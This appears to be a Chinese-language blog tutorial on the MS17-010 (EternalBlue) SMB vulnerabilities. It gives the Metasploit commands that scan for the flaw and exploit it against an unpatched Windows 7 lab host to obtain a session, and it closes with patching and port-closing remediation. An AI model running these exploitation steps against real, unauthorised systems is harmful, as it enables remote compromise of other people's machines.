简介
MS17-010(永恒之蓝)应用的不仅仅是一个漏洞,而是包含Windows SMB 远程代码执行漏洞CVE-2017-0143、CVE-2017-0144、CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148在内的6个SMB漏洞的攻击。
当我们在用namp扫除目标主机开放端口有445时,二话不说就是上MS17-010。
测试漏洞
靶机:未打过补丁的win7
打开metasploit
第一步:search smb_ms17_010

第二步:use auxiliary/scanner/smb/smb_ms17_010
第三步:set RHOSTS 10.10.10.26,然后输入show options查看配置是否完成。
第四步:执行exploit,看到有攻击的可能性。

然后直接上:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.26
explot
最后,假如目标存在MS17-010漏洞,我们可以获取到session:

修复方案
1、为计算机安装最新的安全补丁,微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,网址为https://technet.microsoft.com/zh-cn/library/security/MS17-010。
2、关闭445、135、137、138、139端口,关闭网络共享。
网友评论